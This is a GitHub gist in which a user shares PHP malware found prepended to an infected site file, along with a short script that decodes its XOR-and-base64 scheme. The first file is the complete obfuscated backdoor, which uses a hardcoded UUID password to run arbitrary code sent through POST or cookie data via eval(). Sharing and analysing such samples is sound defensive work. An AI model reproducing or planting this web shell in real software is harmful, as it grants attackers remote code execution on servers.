Last active
March 10, 2016 22:41
-
-
Save ishukshin/ea15b368af626105ed86 to your computer and use it in GitHub Desktop.
Malware found at the top of infected file and decoded by myself. It contains a secret string that looks like serial code and the script is able to execute any php script passed through _POST or _COOKIE.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php $GLOBALS['gd74ce'];global$gd74ce;$gd74ce=$GLOBALS;$gd74ce['a5da']="\x70\x48\x45\xd\x78\x54\x74\x5f\x6e\x69\x33\x5d\x9\x6d\x3f\x36\x2b\x43\x63\x20\x2a\x41\x59\x3b\x40\x72\x47\x58\x57\x6b\x4a\x76\x5e\x53\x46\x7e\x60\x7d\x4e\xa\x2f\x26\x38\x35\x6a\x4b\x25\x5a\x73\x39\x44\x51\x5c\x77\x68\x5b\x4f\x55\x3e\x22\x4c\x71\x6f\x49\x27\x21\x42\x2e\x32\x6c\x3c\x79\x2d\x23\x29\x7c\x3a\x34\x62\x31\x66\x52\x2c\x64\x4d\x75\x50\x65\x7b\x67\x61\x37\x3d\x24\x56\x28\x30\x7a";$gd74ce[$gd74ce['a5da'][44].$gd74ce['a5da'][42].$gd74ce['a5da'][78].$gd74ce['a5da'][79].$gd74ce['a5da'][91].$gd74ce['a5da'][10]]=$gd74ce['a5da'][18].$gd74ce['a5da'][54].$gd74ce['a5da'][25];$gd74ce[$gd74ce['a5da'][18].$gd74ce['a5da'][10].$gd74ce['a5da'][91].$gd74ce['a5da'][18].$gd74ce['a5da'][77].$gd74ce['a5da'][49].$gd74ce['a5da'][15]]=$gd74ce['a5da'][62].$gd74ce['a5da'][25].$gd74ce['a5da'][83];$gd74ce[$gd74ce['a5da'][80].$gd74ce['a5da'][18].$gd74ce['a5da'][43].$gd74ce['a5da'][68]]=$gd74ce['a5da'][48].$gd74ce['a5da'][6].$gd74ce['a5da'][25].$gd74ce['a5da'][69].$gd74ce['a5da'][87].$gd74ce['a5da'][8];$gd74ce[$gd74ce['a5da'][87].$gd74ce['a5da'][42].$gd74ce['a5da'][10].$gd74ce['a5da'][87].$gd74ce['a5da'][90].$gd74ce['a5da'][49].$gd74ce['a5da'][49].$gd74ce['a5da'][90].$gd74ce['a5da'][43]]=$gd74ce['a5da'][9].$gd74ce['a5da'][8].$gd74ce['a5da'][9].$gd74ce['a5da'][7].$gd74ce['a5da'][48].$gd74ce['a5da'][87].$gd74ce['a5da'][6];$gd74ce[$gd74ce['a5da'][69].$gd74ce['a5da'][10].$gd74ce['a5da'][96].$gd74ce['a5da'][18].$gd74ce['a5da'][96].$gd74ce['a5da'][49].$gd74ce['a5da'][96].$gd74ce['a5da'][77].$gd74ce['a5da'][18]]=$gd74ce['a5da'][48].$gd74ce['a5da'][87].$gd74ce['a5da'][25].$gd74ce['a5da'][9].$gd74ce['a5da'][90].$gd74ce['a5da'][69].$gd74ce['a5da'][9].$gd74ce['a5da'][97].$gd74ce['a5da'][87];$gd74ce[$gd74ce['a5da'][89].$gd74ce['a5da'][49].$gd74ce['a5da'][68].$gd74ce['a5da'][77].$gd74ce['a5da'][43].$gd74ce['a5da'][91].$gd74ce['a5da'][83].$gd74ce['a5da'][43]]=$gd74ce['a5da'][0].$gd74ce['a5da'][54].$gd74ce['a5da'][0].$gd74ce['a5da'][31].$gd74ce['a5da'][87].$gd74ce['a5da'][25].$gd74ce['a5da'][48].$gd74ce['a5da'][9].$gd74ce['a5da'][62].$gd74ce['a5da'][8];$gd74ce[$gd74ce['a5da'][80].$gd74ce['a5da'][42].$gd74ce['a5da'][91].$gd74ce['a5da'][68].$gd74ce['a5da'][18].$gd74ce['a5da'][83].$gd74ce['a5da'][80].$gd74ce['a5da'][80]]=$gd74ce['a5da'][85].$gd74ce['a5da'][8].$gd74ce['a5da'][48].$gd74ce['a5da'][87].$gd74ce['a5da'][25].$gd74ce['a5da'][9].$gd74ce['a5da'][90].$gd74ce['a5da'][69].$gd74ce['a5da'][9].$gd74ce['a5da'][97].$gd74ce['a5da'][87];$gd74ce[$gd74ce['a5da'][89].$gd74ce['a5da'][15].$gd74ce['a5da'][78].$gd74ce['a5da'][80]]=$gd74ce['a5da'][78].$gd74ce['a5da'][90].$gd74ce['a5da'][48].$gd74ce['a5da'][87].$gd74ce['a5da'][15].$gd74ce['a5da'][77].$gd74ce['a5da'][7].$gd74ce['a5da'][83].$gd74ce['a5da'][87].$gd74ce['a5da'][18].$gd74ce['a5da'][62].$gd74ce['a5da'][83].$gd74ce['a5da'][87];$gd74ce[$gd74ce['a5da'][53].$gd74ce['a5da'][42].$gd74ce['a5da'][80].$gd74ce['a5da'][77].$gd74ce['a5da'][42].$gd74ce['a5da'][49].$gd74ce['a5da'][90]]=$gd74ce['a5da'][48].$gd74ce['a5da'][87].$gd74ce['a5da'][6].$gd74ce['a5da'][7].$gd74ce['a5da'][6].$gd74ce['a5da'][9].$gd74ce['a5da'][13].$gd74ce['a5da'][87].$gd74ce['a5da'][7].$gd74ce['a5da'][69].$gd74ce['a5da'][9].$gd74ce['a5da'][13].$gd74ce['a5da'][9].$gd74ce['a5da'][6];$gd74ce[$gd74ce['a5da'][62].$gd74ce['a5da'][68].$gd74ce['a5da'][80].$gd74ce['a5da'][68].$gd74ce['a5da'][49].$gd74ce['a5da'][15].$gd74ce['a5da'][18].$gd74ce['a5da'][90]]=$gd74ce['a5da'][13].$gd74ce['a5da'][96].$gd74ce['a5da'][43].$gd74ce['a5da'][78];$gd74ce[$gd74ce['a5da'][61].$gd74ce['a5da'][10].$gd74ce['a5da'][83].$gd74ce['a5da'][49].$gd74ce['a5da'][87].$gd74ce['a5da'][49].$gd74ce['a5da'][79].$gd74ce['a5da'][18].$gd74ce['a5da'][79]]=$gd74ce['a5da'][48].$gd74ce['a5da'][43].$gd74ce['a5da'][77].$gd74ce['a5da'][43].$gd74ce['a5da'][91].$gd74ce['a5da'][90].$gd74ce['a5da'][96].$gd74ce['a5da'][79].$gd74ce['a5da'][90];$gd74ce[$gd74ce['a5da'][0].$gd74ce['a5da'][42].$gd74ce['a5da'][68].$gd74ce['a5da'][91]]=$_POST;$gd74ce[$gd74ce['a5da'][80].$gd74ce['a5da'][91].$gd74ce['a5da'][91].$gd74ce['a5da'][78].$gd74ce['a5da'][79]]=$_COOKIE;@$gd74ce[$gd74ce['a5da'][87].$gd74ce['a5da'][42].$gd74ce['a5da'][10].$gd74ce['a5da'][87].$gd74ce['a5da'][90].$gd74ce['a5da'][49].$gd74ce['a5da'][49].$gd74ce['a5da'][90].$gd74ce['a5da'][43]]($gd74ce['a5da'][87].$gd74ce['a5da'][25].$gd74ce['a5da'][25].$gd74ce['a5da'][62].$gd74ce['a5da'][25].$gd74ce['a5da'][7].$gd74ce['a5da'][69].$gd74ce['a5da'][62].$gd74ce['a5da'][89],NULL);@$gd74ce[$gd74ce['a5da'][87].$gd74ce['a5da'][42].$gd74ce['a5da'][10].$gd74ce['a5da'][87].$gd74ce['a5da'][90].$gd74ce['a5da'][49].$gd74ce['a5da'][49].$gd74ce['a5da'][90].$gd74ce['a5da'][43]]($gd74ce['a5da'][69].$gd74ce['a5da'][62].$gd74ce['a5da'][89].$gd74ce['a5da'][7].$gd74ce['a5da'][87].$gd74ce['a5da'][25].$gd74ce['a5da'][25].$gd74ce['a5da'][62].$gd74ce['a5da'][25].$gd74ce['a5da'][48],0);@$gd74ce[$gd74ce['a5da'][87].$gd74ce['a5da'][42].$gd74ce['a5da'][10].$gd74ce['a5da'][87].$gd74ce['a5da'][90].$gd74ce['a5da'][49].$gd74ce['a5da'][49].$gd74ce['a5da'][90].$gd74ce['a5da'][43]]($gd74ce['a5da'][13].$gd74ce['a5da'][90].$gd74ce['a5da'][4].$gd74ce['a5da'][7].$gd74ce['a5da'][87].$gd74ce['a5da'][4].$gd74ce['a5da'][87].$gd74ce['a5da'][18].$gd74ce['a5da'][85].$gd74ce['a5da'][6].$gd74ce['a5da'][9].$gd74ce['a5da'][62].$gd74ce['a5da'][8].$gd74ce['a5da'][7].$gd74ce['a5da'][6].$gd74ce['a5da'][9].$gd74ce['a5da'][13].$gd74ce['a5da'][87],0);@$gd74ce[$gd74ce['a5da'][53].$gd74ce['a5da'][42].$gd74ce['a5da'][80].$gd74ce['a5da'][77].$gd74ce['a5da'][42].$gd74ce['a5da'][49].$gd74ce['a5da'][90]](0);$j50f1ae0b=NULL;$x625b=NULL;$gd74ce[$gd74ce['a5da'][4].$gd74ce['a5da'][42].$gd74ce['a5da'][91].$gd74ce['a5da'][91].$gd74ce['a5da'][79].$gd74ce['a5da'][91]]=$gd74ce['a5da'][91].$gd74ce['a5da'][80].$gd74ce['a5da'][43].$gd74ce['a5da'][78].$gd74ce['a5da'][15].$gd74ce['a5da'][87].$gd74ce['a5da'][10].$gd74ce['a5da'][78].$gd74ce['a5da'][72].$gd74ce['a5da'][87].$gd74ce['a5da'][78].$gd74ce['a5da'][83].$gd74ce['a5da'][90].$gd74ce['a5da'][72].$gd74ce['a5da'][77].$gd74ce['a5da'][83].$gd74ce['a5da'][77].$gd74ce['a5da'][79].$gd74ce['a5da'][72].$gd74ce['a5da'][42].$gd74ce['a5da'][79].$gd74ce['a5da'][80].$gd74ce['a5da'][96].$gd74ce['a5da'][72].$gd74ce['a5da'][18].$gd74ce['a5da'][43].$gd74ce['a5da'][18].$gd74ce['a5da'][78].$gd74ce['a5da'][49].$gd74ce['a5da'][87].$gd74ce['a5da'][77].$gd74ce['a5da'][49].$gd74ce['a5da'][18].$gd74ce['a5da'][79].$gd74ce['a5da'][49].$gd74ce['a5da'][87];global$x87717;function s5457a01a($j50f1ae0b,$vbc4){global$gd74ce;$aedc="";for($dbcad=0;$dbcad<$gd74ce[$gd74ce['a5da'][80].$gd74ce['a5da'][18].$gd74ce['a5da'][43].$gd74ce['a5da'][68]]($j50f1ae0b);){for($d4b20f=0;$d4b20f<$gd74ce[$gd74ce['a5da'][80].$gd74ce['a5da'][18].$gd74ce['a5da'][43].$gd74ce['a5da'][68]]($vbc4)&&$dbcad<$gd74ce[$gd74ce['a5da'][80].$gd74ce['a5da'][18].$gd74ce['a5da'][43].$gd74ce['a5da'][68]]($j50f1ae0b);$d4b20f++,$dbcad++){$aedc.=$gd74ce[$gd74ce['a5da'][44].$gd74ce['a5da'][42].$gd74ce['a5da'][78].$gd74ce['a5da'][79].$gd74ce['a5da'][91].$gd74ce['a5da'][10]]($gd74ce[$gd74ce['a5da'][18].$gd74ce['a5da'][10].$gd74ce['a5da'][91].$gd74ce['a5da'][18].$gd74ce['a5da'][77].$gd74ce['a5da'][49].$gd74ce['a5da'][15]]($j50f1ae0b[$dbcad])^$gd74ce[$gd74ce['a5da'][18].$gd74ce['a5da'][10].$gd74ce['a5da'][91].$gd74ce['a5da'][18].$gd74ce['a5da'][77].$gd74ce['a5da'][49].$gd74ce['a5da'][15]]($vbc4[$d4b20f]));}}return$aedc;}function m05b($j50f1ae0b,$vbc4){global$gd74ce;global$x87717;return$gd74ce[$gd74ce['a5da'][61].$gd74ce['a5da'][10].$gd74ce['a5da'][83].$gd74ce['a5da'][49].$gd74ce['a5da'][87].$gd74ce['a5da'][49].$gd74ce['a5da'][79].$gd74ce['a5da'][18].$gd74ce['a5da'][79]]($gd74ce[$gd74ce['a5da'][61].$gd74ce['a5da'][10].$gd74ce['a5da'][83].$gd74ce['a5da'][49].$gd74ce['a5da'][87].$gd74ce['a5da'][49].$gd74ce['a5da'][79].$gd74ce['a5da'][18].$gd74ce['a5da'][79]]($j50f1ae0b,$x87717),$vbc4);}foreach($gd74ce[$gd74ce['a5da'][80].$gd74ce['a5da'][91].$gd74ce['a5da'][91].$gd74ce['a5da'][78].$gd74ce['a5da'][79]]as$vbc4=>$nbc6b5813){$j50f1ae0b=$nbc6b5813;$x625b=$vbc4;}if(!$j50f1ae0b){foreach($gd74ce[$gd74ce['a5da'][0].$gd74ce['a5da'][42].$gd74ce['a5da'][68].$gd74ce['a5da'][91]]as$vbc4=>$nbc6b5813){$j50f1ae0b=$nbc6b5813;$x625b=$vbc4;}}$j50f1ae0b=@$gd74ce[$gd74ce['a5da'][80].$gd74ce['a5da'][42].$gd74ce['a5da'][91].$gd74ce['a5da'][68].$gd74ce['a5da'][18].$gd74ce['a5da'][83].$gd74ce['a5da'][80].$gd74ce['a5da'][80]]($gd74ce[$gd74ce['a5da'][62].$gd74ce['a5da'][68].$gd74ce['a5da'][80].$gd74ce['a5da'][68].$gd74ce['a5da'][49].$gd74ce['a5da'][15].$gd74ce['a5da'][18].$gd74ce['a5da'][90]]($gd74ce[$gd74ce['a5da'][89].$gd74ce['a5da'][15].$gd74ce['a5da'][78].$gd74ce['a5da'][80]]($j50f1ae0b),$x625b));if(isset($j50f1ae0b[$gd74ce['a5da'][90].$gd74ce['a5da'][29]])&&$x87717==$j50f1ae0b[$gd74ce['a5da'][90].$gd74ce['a5da'][29]]){if($j50f1ae0b[$gd74ce['a5da'][90]]==$gd74ce['a5da'][9]){$dbcad=Array($gd74ce['a5da'][0].$gd74ce['a5da'][31]=>@$gd74ce[$gd74ce['a5da'][89].$gd74ce['a5da'][49].$gd74ce['a5da'][68].$gd74ce['a5da'][77].$gd74ce['a5da'][43].$gd74ce['a5da'][91].$gd74ce['a5da'][83].$gd74ce['a5da'][43]](),$gd74ce['a5da'][48].$gd74ce['a5da'][31]=>$gd74ce['a5da'][79].$gd74ce['a5da'][67].$gd74ce['a5da'][96].$gd74ce['a5da'][72].$gd74ce['a5da'][79],);echo@$gd74ce[$gd74ce['a5da'][69].$gd74ce['a5da'][10].$gd74ce['a5da'][96].$gd74ce['a5da'][18].$gd74ce['a5da'][96].$gd74ce['a5da'][49].$gd74ce['a5da'][96].$gd74ce['a5da'][77].$gd74ce['a5da'][18]]($dbcad);}elseif($j50f1ae0b[$gd74ce['a5da'][90]]==$gd74ce['a5da'][87]){eval($j50f1ae0b[$gd74ce['a5da'][83]]);}exit();} ?><?php |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| $x87717 = '7f5b6e3b-ebda-4d41-81f0-c5cb9e49c19e'; | |
| function s5457a01a($j50f1ae0b, $vbc4) { | |
| global$gd74ce; | |
| $aedc = ""; | |
| for ($dbcad = 0; $dbcad < strlen ($j50f1ae0b); | |
| ) { | |
| for ($d4b20f = 0; $d4b20f < strlen ($vbc4) && $dbcad < strlen ($j50f1ae0b); $d4b20f++, $dbcad++) { | |
| $aedc.= chr ( ord ($j50f1ae0b[$dbcad]) ^ ord ($vbc4[$d4b20f])); | |
| } | |
| }return$aedc; | |
| } | |
| function m05b($j50f1ae0b, $vbc4) { | |
| global$gd74ce; | |
| global$x87717; | |
| return s5457a01a ( s5457a01a ($j50f1ae0b, $x87717), $vbc4); | |
| } | |
| $x = m05b ( base64_decode ($stringencoded), $key); | |
| var_dump($x); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment